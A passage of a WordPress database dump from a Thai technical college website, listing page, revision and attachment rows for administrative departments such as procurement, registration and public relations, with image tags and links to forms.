(1569, 3, '2018-03-07 09:43:43', '2018-03-07 02:43:43', '', 'ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%ad%e0%b8%9a%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%97%e0%b8%b3%e0%b8%84%e0%b8%b8', '', '', '2018-03-07 09:43:43', '2018-03-07 02:43:43', '', 1545, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์.doc', 0, 'attachment', 'application/msword', 0),
(1570, 3, '2018-03-07 09:44:14', '2018-03-07 02:44:14', '', 'ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์ _', '', 'inherit', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b1%e0%b8%a7%e0%b8%ad%e0%b8%a2%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94', '', '', '2018-03-07 09:44:14', '2018-03-07 02:44:14', '', 1545, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์-_.doc', 0, 'attachment', 'application/msword', 0),
(1571, 3, '2018-03-07 09:44:35', '2018-03-07 02:44:35', '<img class=\"aligncenter size-full wp-image-1482\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"383\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n<h4><span style=\"color: #0000ff;\">**แบบฟอร์ม สผ. (งาน) <span style=\"color: #ff0000;\">คลิก</span></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><span style=\"color: #ff00ff;\">**แบบฟอร์ม สผ. (แผนก)</span> <span style=\"color: #ff0000;\">คลิก</span></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><span style=\"color: #339966;\">**แบบฟอร์มการจัดทำ SPEC</span></span></h4>\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มคุณลักษณะครุภัณฑ์.doc\">แบบฟอร์มคุณลักษณะครุภัณฑ์</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ขั้นตอนการจัดทำSPEC.pdf\">ขั้นตอนการจัดทำSPEC</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์.doc\">ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์-_.doc\">ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์ </a></span>\r\n\r\n ', 'งานพัสดุ', '', 'inherit', 'closed', 'closed', '', '1545-revision-v1', '', '', '2018-03-07 09:44:35', '2018-03-07 02:44:35', '', 1545, 'http://www.technicrayong.ac.th/1545-revision-v1/', 0, 'revision', '', 0),
(1572, 3, '2018-03-07 09:51:04', '2018-03-07 02:51:04', '<img class=\"aligncenter size-full wp-image-1614\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1493 \" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"381\" height=\"102\" /><a href=\"/wp-content/uploads/2018/11/21-11-2561-10-01-27.jpg\"><img class=\"aligncenter size-full wp-image-4645\" src=\"/wp-content/uploads/2018/11/21-11-2561-10-01-27.jpg\" alt=\"\" width=\"563\" height=\"358\" /></a>', 'งานอาคารสถานที่', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%ad%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%97%e0%b8%b5%e0%b9%88', '', '', '2018-11-21 09:59:38', '2018-11-21 02:59:38', '', 0, 'http://www.technicrayong.ac.th/?page_id=1572', 0, 'page', '', 0),
(1573, 3, '2018-03-07 09:51:04', '2018-03-07 02:51:04', '<img class=\"aligncenter size-full wp-image-1492\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" />\r\n\r\n<img class=\"aligncenter wp-image-1493 \" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"381\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />', 'งานอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '1572-revision-v1', '', '', '2018-03-07 09:51:04', '2018-03-07 02:51:04', '', 1572, 'http://www.technicrayong.ac.th/1572-revision-v1/', 0, 'revision', '', 0),
(1575, 3, '2018-03-07 09:52:12', '2018-03-07 02:52:12', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1472 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1477 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1482 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a>\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1483\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1492 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1495\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1502\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" />\r\n\r\n<img class=\"aligncenter wp-image-1503 \" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" />\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-07 09:52:12', '2018-03-07 02:52:12', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1576, 3, '2018-03-07 09:54:12', '2018-03-07 02:54:12', '<img class=\"aligncenter size-full wp-image-1619\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496 \" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /><a href=\"/wp-content/uploads/2018/11/21-11-2561-10-13-17.jpg\"><img class=\"aligncenter size-full wp-image-4647\" src=\"/wp-content/uploads/2018/11/21-11-2561-10-13-17.jpg\" alt=\"\" width=\"713\" height=\"620\" /></a>\r\n<h3><span style=\"color: #993300;\">** ข้อมูลนักเรียน นักศึกษา </span> <a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9-2/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\r\n<h3><span style=\"color: #993300;\">** รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา </span><a href=\"/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%B1%E0%B8%A1%E0%B8%A4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B9%8C%E0%B8%97%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A3/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\r\n ', 'งานทะเบียน', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%97%e0%b8%b0%e0%b9%80%e0%b8%9a%e0%b8%b5%e0%b8%a2%e0%b8%99', '', '', '2018-11-21 10:11:47', '2018-11-21 03:11:47', '', 0, 'http://www.technicrayong.ac.th/?page_id=1576', 0, 'page', '', 0),
(1577, 3, '2018-03-07 09:54:12', '2018-03-07 02:54:12', '<img class=\"aligncenter size-full wp-image-1495\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496 \" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n ', 'งานทะเบียน', '', 'inherit', 'closed', 'closed', '', '1576-revision-v1', '', '', '2018-03-07 09:54:12', '2018-03-07 02:54:12', '', 1576, 'http://www.technicrayong.ac.th/1576-revision-v1/', 0, 'revision', '', 0),
(1579, 3, '2018-03-07 09:55:02', '2018-03-07 02:55:02', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1472 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1477 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1482 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a>\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1483\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1492 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/งานทะเบียน\"><img class=\"aligncenter wp-image-1495 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1502\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" />\r\n\r\n<img class=\"aligncenter wp-image-1503 \" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" />\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-07 09:55:02', '2018-03-07 02:55:02', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1581, 3, '2018-03-07 10:00:25', '2018-03-07 03:00:25', '<img class=\"aligncenter size-full wp-image-1495\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496 \" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n<h3><span style=\"color: #993300;\">** ข้อมูลนักเรียน นักศึกษา ปีการศึกษา 2560</span> <a href=\"http://www.technicrayong.ac.th/ข้อมูลนักเรียนนักศึกษา60\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\r\n ', 'งานทะเบียน', '', 'inherit', 'closed', 'closed', '', '1576-revision-v1', '', '', '2018-03-07 10:00:25', '2018-03-07 03:00:25', '', 1576, 'http://www.technicrayong.ac.th/1576-revision-v1/', 0, 'revision', '', 0),
(1582, 3, '2018-03-07 10:03:19', '2018-03-07 03:03:19', '<img class=\"aligncenter size-full wp-image-1623\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-12-02.jpg\" alt=\"\" width=\"195\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1503 \" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"363\" height=\"98\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1626\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-17-46-235x300.jpg\" alt=\"\" width=\"235\" height=\"300\" />\r\n\r\n \r\n\r\n ', 'งานประชาสัมพันธ์', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c', '', '', '2018-03-07 14:18:45', '2018-03-07 07:18:45', '', 0, 'http://www.technicrayong.ac.th/?page_id=1582', 0, 'page', '', 0),
(1583, 3, '2018-03-07 10:03:19', '2018-03-07 03:03:19', '<img class=\"aligncenter size-full wp-image-1502\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" />\r\n\r\n<img class=\"aligncenter wp-image-1503 \" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"388\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1504 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"285\" height=\"341\" />\r\n\r\n \r\n\r\n ', 'งานประชาสัมพันธ์', '', 'inherit', 'closed', 'closed', '', '1582-revision-v1', '', '', '2018-03-07 10:03:19', '2018-03-07 03:03:19', '', 1582, 'http://www.technicrayong.ac.th/1582-revision-v1/', 0, 'revision', '', 0),
(1585, 3, '2018-03-07 10:05:06', '2018-03-07 03:05:06', '<img class=\"aligncenter size-full wp-image-1502\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" />\r\n\r\n<img class=\"aligncenter wp-image-1503 \" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"363\" height=\"98\" />\r\n\r\n<img class=\"aligncenter wp-image-1504 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"285\" height=\"341\" />\r\n\r\n \r\n\r\n ', 'งานประชาสัมพันธ์', '', 'inherit', 'closed', 'closed', '', '1582-revision-v1', '', '', '2018-03-07 10:05:06', '2018-03-07 03:05:06', '', 1582, 'http://www.technicrayong.ac.th/1582-revision-v1/', 0, 'revision', '', 0),
(1586, 3, '2018-03-07 10:06:06', '2018-03-07 03:06:06', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1472 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1477 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1482 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a>\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1483\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1492 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1495 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1502 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', 